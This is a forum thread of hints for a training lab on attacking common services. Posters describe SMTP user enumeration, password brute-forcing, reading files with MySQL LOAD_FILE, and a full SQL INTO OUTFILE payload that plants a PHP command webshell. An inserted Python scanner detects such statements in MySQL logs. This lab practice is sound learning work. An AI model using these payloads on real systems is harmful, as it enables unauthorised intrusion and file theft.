Attacking Common Services - Easy

Hello! Has anyone managed to upload the file the second way via FTP (PORT/EPRT)? Give me a hint how?

port 4443

  1. Enumeration
  2. Brute-Force (users.list/rockyou.txt)
  3. Attacking SQL Databases (Write Local Files) → SELECT "" into outfile "C:\xa\htd***\***.php"

Hi guys, I managed to get the flag by manually ‘bruteforcing’ the LOAD_FILE path. However, I still don’t get how to do it with a webshell. I tried uploading the webshell in multiple directories but I was only able to execute dir and whoami. I also used revshells.com to generate multiple shells and uploaded them, but I couldn’t link them back to my listener. Could anybody please explain to me how they did it?

Are you sure about that? Don’t give up and try again; maybe you are putting something wrong.

Hey guys, just in case you still need help: there are two ways to get the flag. One is through FTP, using the tool “CURL”, and the other is through MYSQL, using SELECT LOAD('PATH'); and other commands that are in the text of the chapter Attacking SQL Services (YOU CAN FIND THE PATH IN HERE BY READING OTHER PEOPLE’S POSTS, OR IN YOUR VICTIM MACHINE). Both attacks follow the chapters from Attacking Common Services. I did both just to learn more ways to attack a machine. Good luck to those that are still struggling and to those that will be reading this post in the future! By the way, I got the flag twice. ;)

How did you manage to upload a PHP shell via FTP and get it executed? Using curl I can only view the webshell content, not execute it.

Yes, there is a path to the Apache server where you can upload the webshell. Carefully read the files and you will find the path. Then you can use CURL to execute commands. I found it more helpful than executing commands through the browser. Last, don’t forget to try to do it through MYSQL; it is worth doing it both ways. Just remember it will be the same page if you want to upload a webshell, or if you want to try to guess where the flag is, you can do it by using SELECT LOAD('Path to flag.txt'); just try to guess if Fiona has it or Admin has it.

Hey, thanks. I already managed to get flag.txt using the MySQL path. I’m stuck on the FTP path: how did you manage to upload the webshell through FTP into the Apache directory? I can only put the webshell in the FTP directory. I tried directory traversal but nothing worked.

Guys, why do I get 0 results when I’m using smtp-user-enum with the provided list users.list? I tried both on my Kali and from the Parrot browser instance, same result. Is there an alternative list which needs to be found first?

Edit: Nevermind, it worked the other day.

I just recommend using this tip: "SELECT LOAD_FILE('/U**/Adm****/***/flag.txt');" when you have already got the MySQL creds.

What is the point of providing a password list if the password isn’t in it? Isn’t academy meant to be a learning platform? What exactly am I meant to be learning while waiting an hour to crack a password? The point is knowing what commands to run and running them correctly, not in guessing the correct password list. This is unnecessarily time consuming and frustrating.


This took me 10x longer than I expected. I will just say this to people who came here like me, disgruntled and desperate to find help. There are multiple ways of tackling this lab, but I suggest you just stick mainly with SMTP and MySQL. You’ll get info from initially browsing the website and later when you follow my advice, but I don’t think finding website exploits embodies the spirit of the module. You don’t even need Metasploit for it. For anyone stumped with brute-forcing the different services, you might have overlooked one obvious service after being done enumerating it once ;). I’ll say for the rest of the lab, I think it’s better if you practice writing a webshell and then going from there, whether or not you wanna make a reverse one. Browsing the PHP website will kinda help you map out where you write the file.

Agreed!

There are multiple paths to solve this box.

I managed to solve it using FTP (using an existing vulnerability, took me a while to understand the syntax) and managed to upload and execute a reverse shell.

I am somehow “stuck” in the mysql pathway. I am able to use load to directly find the flag, and save a php web shell and execute it. However, I am stuck trying to save a reverse shell and execute it.

Is saving a reverse shell using MySQL not possible? I encounter syntax issues when saving the reverse shell due to the use of ' and ", which also caused problems when executing the shell.

I used sql injection against the Database and was able to upload a webshell to the server and then get the flag.

Basically you need to do:

  1. Enumerate the smtp to find the username
  2. Use Hydra or Medusa to bruteforce against the smtp server using a password list (do not use the one given in the module).
  3. Use the obtained credentials to try out the servers, found a mysql server and log in.
  4. Find a table that contains at least one column.
  5. Apply your sql injection technique
    SELECT * FROM table WHERE table_id=1 UNION ALL SELECT "<?php system($_REQUEST['cmd']); ?>",'N' INTO OUTFILE '<path to your server site>/webshell.php'
  6. Go to the web browser, type in http://10.129.x.x/<path_to_server_site>/webshell.php?cmd=type <path_to_flag>

You can do a webshell; the tricky part is to find a table that contains at least one column and leverage SQL injection using the UNION keyword.
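On the defending side, the `INTO OUTFILE` writes and `LOAD_FILE` reads discussed in this thread show up in the MySQL general query log. The following is an added example, not part of any post above: a small scanner that flags such statements. The log lines, paths and function names are constructed for illustration.

```python
import re

# Constructed sample lines in MySQL general query log layout (not taken from the lab).
SAMPLE_LOG = """\
2024-05-01T10:15:30.000001Z\t   12 Connect\twebuser@10.0.0.5 on appdb using TCP/IP
2024-05-01T10:15:31.000001Z\t   12 Query\tSELECT name FROM products WHERE id=1
2024-05-01T10:15:32.000001Z\t   12 Query\tSELECT * FROM t WHERE id=1 UNION ALL SELECT "<?php /* payload */ ?>",'N' INTO OUTFILE 'C:/webroot/placeholder.php'
2024-05-01T10:15:33.000001Z\t   12 Query\tSELECT LOAD_FILE('C:/Users/placeholder/flag.txt')
2024-05-01T10:15:34.000001Z\t   13 Query\tSELECT id FROM orders INTO OUTFILE '/var/lib/mysql-files/orders.csv'
"""

LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")
WRITE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s+(['\"])(?P<path>.+?)\1", re.I)
READ = re.compile(r"\bLOAD_FILE\s*\(\s*(['\"])(?P<path>.+?)\1\s*\)", re.I)
SCRIPT_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp")


def classify(sql):
    """Return (severity, kind, path) tuples for server-side file access in one statement."""
    findings = []
    m = WRITE.search(sql)
    if m:
        path = m.group("path")
        # A write that lands a server-side script, or carries a PHP tag, is the webshell pattern.
        risky = path.lower().endswith(SCRIPT_EXT) or "<?php" in sql.lower()
        findings.append(("high" if risky else "medium", "file-write", path))
    for m in READ.finditer(sql):
        findings.append(("medium", "file-read", m.group("path")))
    return findings


def scan(log_text):
    """Scan general-log text and return one alert dict per finding, in log order."""
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # Connect/Quit lines and continuation lines are skipped
        for severity, kind, path in classify(m.group("sql")):
            alerts.append({"ts": m.group("ts"), "conn": int(m.group("conn")),
                           "severity": severity, "kind": kind, "path": path})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Setting `secure_file_priv` to a dedicated directory (or `NULL`) and not granting the `FILE` privilege to application accounts keeps these statements away from the web root.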

Brute force the MySQL? It will be blocked by the server after a few times.

Hi,
I tried all smtp-user-enum modes (VRFY, RCPT, EXPN) on port 25 and 587 but only get a “valid address is required” or “502 VRFY disallowed”.
I also restarted the machine a couple of times but nothing worked.
I’m confused.